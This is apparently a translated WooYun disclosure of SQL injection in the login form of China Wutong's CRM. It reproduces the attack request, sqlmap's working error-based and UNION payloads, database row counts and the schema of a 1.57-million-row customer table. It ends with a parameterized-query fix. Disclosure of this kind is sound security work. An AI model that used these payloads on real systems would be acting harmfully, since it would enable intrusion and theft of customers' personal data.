Vulnerability summary

Defect ID: wooyun-2015-0142194

Title: SQL injection in a critical system of 中国物通网 (China Wutong, chinawutong.com) can leak the detailed records of 1.57 million (157W) customers

Vendor: 中国物通网

Author: 无名人

Submitted: 2015-09-20 18:59

Fixed: 2015-11-08 11:06

Published: 2015-11-08 11:06

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2015-09-20: Details sent to the vendor, awaiting vendor handling
2015-09-24: Vendor confirmed; details visible to the vendor only
2015-10-04: Details disclosed to core white hats and experts in related fields
2015-10-14: Details disclosed to regular white hats
2015-10-24: Details disclosed to intern white hats
2015-11-08: Details disclosed to the public

Summary:

As in the title. With this much data, please process this under the major-vendor track.

Detailed description:

Affected system: CRM management system
Vulnerable endpoint:

POST /login.aspx HTTP/1.1
Host: crm.chinawutong.com
Content-Length: 460
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://crm.chinawutong.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://crm.chinawutong.com/login.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=ypyhncvrkcp4jq45istarx55
__VIEWSTATE=%2FwEPDwUKMTg0OTA4MDM5Ng9kFgJmD2QWAgIBD2QWAgIBD2QWAgIDDw9kFgIeBVZhbHVlZWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFHWN0bDAwJE1haW5Db250ZW50JGNieFJlbWVtYmVy%2BPT8xnnTfEawqVDiAEYGXDvJB04%3D&__EVENTVALIDATION=%2FwEWBgKRyKDLDQLwkrODBALil%2B%2BSAgK5ysLjCwKo36WDDQKRnIq9DwMkbemJvGjpIJD0LGAzxJ6h%2FDWg&ctl00%24MainContent%24tbxUserName=admin&ctl00%24MainContent%24tbxPassWord=admin&ctl00%24MainContent%24txtCode=cerc&ctl00%24MainContent%24btnLogin=


The ctl00$MainContent$tbxUserName parameter is vulnerable to SQL injection (sqlmap output below):

---
Parameter: ctl00$MainContent$tbxUserName (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKMTg0OTA4MDM5Ng9kFgJmD2QWAgIBD2QWAgIBD2QWAgIDDw9kFgIeBVZhbHVlZWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFHWN0bDAwJE1haW5Db250ZW50JGNieFJlbWVtYmVy+PT8xnnTfEawqVDiAEYGXDvJB04=&__EVENTVALIDATION=/wEWBgKRyKDLDQLwkrODBALil++SAgK5ysLjCwKo36WDDQKRnIq9DwMkbemJvGjpIJD0LGAzxJ6h/DWg&ctl00$MainContent$tbxUserName=admin' AND 2866=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2866=2866) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(113))) AND 'CzCc'='CzCc&ctl00$MainContent$tbxPassWord=admin&ctl00$MainContent$txtCode=xfkt&ctl00$MainContent$btnLogin=
Type: UNION query
Title: Generic UNION query (NULL) - 33 columns
Payload: __VIEWSTATE=/wEPDwUKMTg0OTA4MDM5Ng9kFgJmD2QWAgIBD2QWAgIBD2QWAgIDDw9kFgIeBVZhbHVlZWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFHWN0bDAwJE1haW5Db250ZW50JGNieFJlbWVtYmVy+PT8xnnTfEawqVDiAEYGXDvJB04=&__EVENTVALIDATION=/wEWBgKRyKDLDQLwkrODBALil++SAgK5ysLjCwKo36WDDQKRnIq9DwMkbemJvGjpIJD0LGAzxJ6h/DWg&ctl00$MainContent$tbxUserName=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(107)+CHAR(122)+CHAR(113)+CHAR(88)+CHAR(107)+CHAR(72)+CHAR(90)+CHAR(73)+CHAR(83)+CHAR(65)+CHAR(72)+CHAR(108)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &ctl00$MainContent$tbxPassWord=admin&ctl00$MainContent$txtCode=xfkt&ctl00$MainContent$btnLogin=
---

Proof of vulnerability:

Databases:

(screenshot 1.png: database list)


Row counts per table:

Database: WutongCRM
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.WTCRM_HND_ContactRecordOld | 1939015 |
| dbo.WTCRM_HND_CustomerInfo | 1576796 |
| dbo.VS_SYS_LogInfo | 950017 |
| dbo.WTCRM_SYS_LogInfo | 950017 |
| dbo.WTCRM_HND_VerfiyRecord | 684513 |
| dbo.WTCRM_HND_ConsultRecord | 602475 |
| dbo.WTCRM_HND_SeverRecordDelete | 446428 |
| dbo.WTCRM_HND_WorkRecord | 270504 |
| dbo.WTCRM_HND_RelationInfo | 231078 |
| dbo.WTCRM_SYS_EmailRecord | 224168 |
| dbo.WTCRM_HND_AllocateDetail | 191325 |
| dbo.WTCRM_HND_TemporaryCustomer | 186692 |
| dbo.WTCRM_HND_CensusInfo | 127971 |
| dbo.WTCRM_HND_ModifyInfo | 109814 |
| dbo.WTCRM_HND_ServiceRecord | 100772 |
| dbo.WTCRM_HND_WorkExamine | 63592 |
| dbo.WTCRM_HND_logRespondNotice | 63558 |
| dbo.WTCRM_HND_WXTOpenRecord | 43034 |
| dbo.WTCRM_HND_OrderRecord | 30579 |
| dbo.WTCRM_HND_AdvertRecord | 25792 |
| dbo.WTCRM_HND_OrderInfo | 24946 |
| dbo.WTCRM_HND_OrderPrintRecord | 24536 |
| dbo.WTCRM_PEP_ResumeRecord | 21791 |
| dbo.WTCRM_SYS_BadWord | 19873 |
| dbo.WTCRM_HND_UpdateRecord | 19039 |
| dbo.WTCRM_HND_MemberKindAlter | 13759 |
| dbo.WTCRM_HND_VisitRecord | 12320 |
| dbo.WTCRM_HND_OrderFullRecord | 10035 |
| dbo.WTCRM_HND_logRespondContact | 9745 |
| dbo.WTCRM_HND_ContactExamine | 9732 |
| dbo.WTCRM_PEP_ResumeInfo | 9133 |
| dbo.WTCRM_HND_PerfectDegree | 7435 |
| dbo.WTCRM_HND_UserDelRecord | 7434 |
| dbo.WTCRM_HND_AppliRemind | 6916 |
| dbo.WTCRM_HND_OrderAssociate | 6303 |
| dbo.WTCRM_SYS_PostRecord | 5885 |
| dbo.WTCRM_SYS_KnowledgeRecord | 5800 |
| dbo.WTCRM_SYS_KnowledgeShare | 5061 |
| dbo.WTCRM_HND_MaintainCar | 4987 |
| dbo.WTCRM_HND_Repeal | 4953 |
| dbo.WTCRM_HND_ServeInfo | 3265 |
| dbo.WTCRM_SYS_ListAreas | 3177 |
| dbo.WTCRM_HND_SyncRecord | 3107 |
| dbo.WTCRM_HND_AppliRecord | 3058 |
| dbo.WTCRM_SYS_UserChangeRecord | 2696 |
| dbo.WTCRM_HND_OrderInvoice | 2646 |
| dbo.WTCRM_SYS_DepartureRecord | 2435 |
| dbo.WTCRM_SYS_SalerStore | 2373 |
| dbo.WTCRM_SYS_UserInfo | 2202 |
| dbo.VS_SYS_UserInfo | 2198 |
| dbo.WTCRM_SYS_InvoiceRequest | 1638 |
| dbo.WTCRM_HND_SaleInfoFW | 1626 |
| dbo.WTCRM_PEP_Archives | 1315 |
| dbo.WTCRM_PEP_ExamineXZ | 1263 |
| dbo.WTCRM_HND_ProxyMaterialsDetail | 1243 |
| dbo.WTCRM_HND_Application | 1172 |
| cdc.lsn_time_mapping | 990 |
| dbo.WTCRM_HND_OrderSpareMoney | 869 |
| dbo.WTCRM_HND_AdvertOrderChange | 799 |
| dbo.CallAuth | 752 |
| dbo.Hangup | 752 |
| dbo.WTCRM_FWF_Huo | 674 |
| dbo.WTCRM_SYS_ElementInfo | 671 |
| dbo.WTCRM_HND_SaleBusinessPlan | 489 |
| dbo.WTCRM_HND_ComplaintInfo | 438 |
| dbo.WTCRM_PEP_Examine | 393 |
| dbo.WTCRM_PEP_PayCheck | 384 |
| dbo.WTCRM_PEP_PayChange | 353 |
| dbo.WTCRM_SYS_Citys | 337 |
| dbo.WTCRM_FWF_wshiMainline | 313 |
| dbo.WTCRM_HND_JudgeOrder | 275 |
| dbo.WTCRM_PEP_ResignInfo | 268 |
| dbo.CallEstablish | 246 |
| dbo.WTCRM_PEP_Becomes | 240 |
| dbo.WTCRM_PEP_LogisticsGrade | 237 |
| dbo.WTCRM_PEP_ConnectInfo | 230 |
| dbo.WTCRM_FWF_VehicleLine | 209 |
| dbo.WTCRM_SYS_Domain | 187 |
| dbo.WTCRM_SYS_Suggestion | 179 |
| dbo.WTCRM_HND_Impression | 174 |
| dbo.WTCRM_SYS_TeamInfo | 167 |
| dbo.WTCRM_SYS_GroupInfo | 137 |
| dbo.WTCRM_SYS_RoleInfo | 129 |
| dbo.WTCRM_SYS_SubStation | 120 |
| dbo.WTCRM_PEP_StationChange | 113 |
| dbo.WTCRM_PEP_SalerGrade | 95 |
| dbo.WTCRM_PEP_WebAndPosition | 88 |
| dbo.WTCRM_HND_ProxyInfo | 38 |
| dbo.WTCRM_SYS_AllAgents | 38 |
| dbo.WTCRM_SYS_OrderType | 37 |
| dbo.WTCRM_SYS_Materials | 34 |
| dbo.WTCRM_SYS_Provinces | 34 |
| cdc.captured_columns | 33 |
| dbo.WTCRM_HND_ContactExamineS | 33 |
| dbo.WTCRM_SYS_TargetSaler | 26 |
| dbo.WTCRM_HND_OrderVerify | 24 |
| dbo.WTCRM_SYS_Announcement | 24 |
| dbo.WTCRM_SYS_DepartmentInfo | 24 |
| dbo.WTCRM_HND_Elegant | 22 |
| dbo.WTCRM_SYS_OpenAreas | 21 |
| dbo.WTCRM_SYS_VOIDAPPID | 21 |
| dbo.WTCRM_SYS_KeyWords | 17 |
| dbo.WTCRM_SYS_CustomerProtected | 16 |
| dbo.WTCRM_HND_LinkLimits | 14 |
| dbo.WTCRM_HND_TechnologyLog | 14 |
| dbo.WTCRM_PEP_Wonderful | 14 |
| cdc.dbo_WTCRM_SYS_UserInfo_CT | 11 |
| dbo.WTCRM_SYS_Region | 8 |
| dbo.WTCRM_PEP_Recommend | 5 |
| dbo.WTCRM_SYS_BaseLimits | 4 |
| dbo.WTCRM_SYS_TemplateLimits | 4 |
| cdc.change_tables | 1 |
| cdc.index_columns | 1 |
| dbo.WTCRM_FWF_CarTolls | 1 |
| dbo.WTCRM_FWF_PeiHuo | 1 |
| dbo.WTCRM_HND_VipVehicleInfo | 1 |
+--------------------------------------------------+---------+
Database: master
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| sys.messages | 98318 |
| sys.sysmessages | 98318 |
| sys.fulltext_system_stopwords | 15829 |
| sys.syscolumns | 11966 |
| sys.all_parameters | 7090 |
| sys.system_parameters | 7090 |
| sys.trace_subclass_values | 5366 |
| sys.all_columns | 4670 |
| sys.system_columns | 4626 |
| sys.trace_event_bindings | 4304 |
| sys.syscomments | 2994 |
| dbo.spt_values | 2508 |
| sys.all_objects | 1934 |
| sys.sysobjects | 1934 |
| sys.system_objects | 1928 |
| sys.database_permissions | 1844 |
| sys.syspermissions | 1844 |
| sys.sysprotects | 1843 |
| sys.all_sql_modules | 1783 |
| sys.system_sql_modules | 1783 |
| sys.dm_audit_actions | 454 |
| sys.spatial_reference_systems | 390 |
| sys.event_notification_event_types | 365 |
| sys.all_views | 354 |
| sys.system_views | 354 |
| sys.trigger_event_types | 245 |
| sys.trace_events | 180 |
| sys.allocation_units | 128 |
| sys.partitions | 116 |
| sys.syscharsets | 114 |
| sys.xml_schema_facets | 112 |
| sys.xml_schema_components | 99 |
| sys.system_components_surface_area_configuration | 95 |
| sys.dm_audit_class_type_map | 83 |
| sys.xml_schema_types | 82 |
| sys.configurations | 70 |
| sys.sysconfigures | 70 |
| sys.syscurconfigs | 70 |
| sys.trace_columns | 66 |
| sys.fulltext_document_types | 50 |
| sys.fulltext_languages | 48 |
| INFORMATION_SCHEMA.COLUMNS | 44 |
| sys.columns | 44 |
| sys.systypes | 34 |
| sys.types | 34 |
| sys.syslanguages | 33 |
| sys.securable_classes | 22 |
| sys.trace_categories | 21 |
| sys.xml_schema_component_placements | 18 |
| INFORMATION_SCHEMA.SCHEMATA | 15 |
| sys.schemas | 15 |
| sys.xml_schema_attributes | 15 |
| sys.database_principals | 14 |
| sys.sysusers | 14 |
| sys.database_recovery_status | 13 |
| sys.databases | 13 |
| sys.sysdatabases | 13 |
| sys.server_principals | 11 |
| sys.service_contract_message_usages | 11 |
| sys.server_permissions | 7 |
| sys.sysindexes | 7 |
| sys.indexes | 6 |
| sys.objects | 6 |
| sys.stats_columns | 6 |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 |
| INFORMATION_SCHEMA.TABLES | 5 |
| sys.index_columns | 5 |
| sys.sysindexkeys | 5 |
| sys.tables | 5 |
| sys.endpoints | 4 |
| sys.assembly_types | 3 |
| sys.service_queue_usages | 3 |
| sys.type_assembly_usages | 3 |
| sys.xml_schema_namespaces | 3 |
| sys.database_files | 2 |
| sys.login_token | 2 |
| sys.service_contract_usages | 2 |
| sys.sql_logins | 2 |
| sys.sysfiles | 2 |
| sys.syslogins | 2 |
| sys.user_token | 2 |
| dbo.spt_monitor | 1 |
| sys.assemblies | 1 |
| sys.assembly_files | 1 |
| sys.data_spaces | 1 |
| sys.database_role_members | 1 |
| sys.default_constraints | 1 |
| sys.dm_exec_requests | 1 |
| sys.dm_exec_sessions | 1 |
| sys.filegroups | 1 |
| sys.server_role_members | 1 |
| sys.servers | 1 |
| sys.sysconstraints | 1 |
| sys.sysfilegroups | 1 |
| sys.sysmembers | 1 |
| sys.sysprocesses | 1 |
| sys.sysservers | 1 |
| sys.tcp_endpoints | 1 |
| sys.via_endpoints | 1 |
| sys.xml_schema_collections | 1 |
| sys.xml_schema_model_groups | 1 |
| sys.xml_schema_wildcards | 1 |
+--------------------------------------------------+---------+
Database: msdb
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.backupfile | 910 |
| dbo.backupmediafamily | 455 |
| dbo.backupmediaset | 455 |
| dbo.backupset | 455 |
| dbo.restorefilegroup | 4 |
| dbo.restorehistory | 4 |
| dbo.syspolicy_configuration | 4 |
+--------------------------------------------------+---------+


Customer table:

(screenshot 2.png: customer table)


All kinds of detailed information, far too much of it.

Database: WutongCRM
Table: WTCRM_HND_CustomerInfo
[32 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| Area | varchar |
| Attribution | varchar |
| CellPhone | varchar |
| City | varchar |
| CompanyKind | varchar |
| CompanyName | varchar |
| Country | varchar |
| CurrentStatus | varchar |
| CustomerID | int |
| CustomerKind | varchar |
| CustomerName | varchar |
| DataBaseID | int |
| DetailAddress | varchar |
| Email | varchar |
| Fax | varchar |
| IsAdvisory | int |
| IsShow | bit |
| ModifyTime | datetime |
| ModifyUserID | int |
| OrderID | int |
| Position | varchar |
| Province | varchar |
| QQ | varchar |
| RecordMethod | varchar |
| RecordTime | datetime |
| RenewStatus | varchar |
| Role | varchar |
| SaleID | int |
| Sex | varchar |
| TelePhone | varchar |
| UserID | int |
| Verify | int |
+---------------+----------+


(screenshot 4.png: customer data sample)


Fix recommendation:

Filter the input.
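The following is an added illustration, not code from this page or from the vendor's CRM: the string-concatenation pattern that produces findings like the one above, beside the parameterized ADO.NET form that is the real fix behind "filtering". It targets SQL Server, the DBMS sqlmap identified; the table and column names (SysUser, UserName, Password, PasswordHash, UserID) are assumptions.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Illustrative login lookup for an ASP.NET WebForms page such as login.aspx.
// Schema names are assumptions; the real WutongCRM schema is not on the page.
public static class LoginQueries
{
    // WEAK: form values are spliced into the SQL text. A single quote in
    // tbxUserName closes the literal and the rest of the input becomes SQL,
    // which is why the error-based CONVERT(INT, ...) and UNION ALL SELECT
    // probes in the sqlmap output above are parsed as part of the statement.
    public static int? FindUserConcatenated(SqlConnection conn, string userName, string password)
    {
        string sql = "SELECT UserID FROM SysUser WHERE UserName = '" + userName +
                     "' AND Password = '" + password + "'";
        using (var cmd = new SqlCommand(sql, conn))
        {
            object id = cmd.ExecuteScalar();
            return id == null ? (int?)null : Convert.ToInt32(id);
        }
    }

    // FIXED: the statement text is constant and the user name travels as a
    // typed parameter, so quotes, CONVERT or UNION in the input are compared
    // as data against the column and never alter the query. Only the stored
    // hash is fetched; the password is verified in application code, not SQL.
    public static bool TryGetUserForLogin(SqlConnection conn, string userName,
                                          out int userId, out string passwordHash)
    {
        const string sql = "SELECT UserID, PasswordHash FROM SysUser WHERE UserName = @user";
        using (var cmd = new SqlCommand(sql, conn))
        {
            // Explicit type and size: nothing about the parameter is inferred from the input.
            cmd.Parameters.Add("@user", SqlDbType.NVarChar, 64).Value = userName;
            using (SqlDataReader reader = cmd.ExecuteReader())
            {
                if (!reader.Read())
                {
                    userId = 0;
                    passwordHash = null;
                    return false;
                }
                userId = reader.GetInt32(0);
                passwordHash = reader.GetString(1);
                return true;
            }
        }
    }
}
```

In the login handler, the returned hash is checked with a constant-time comparison against the hash of the submitted password, so the database query itself never depends on the password value.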

Copyright notice: when reposting, please credit the source as 无名人@乌云


Vulnerability response

Vendor response:

Severity: High

Rank: 15

Confirmed: 2015-09-24 11:04

Vendor reply:

Thank you for your support.

Latest status:

None

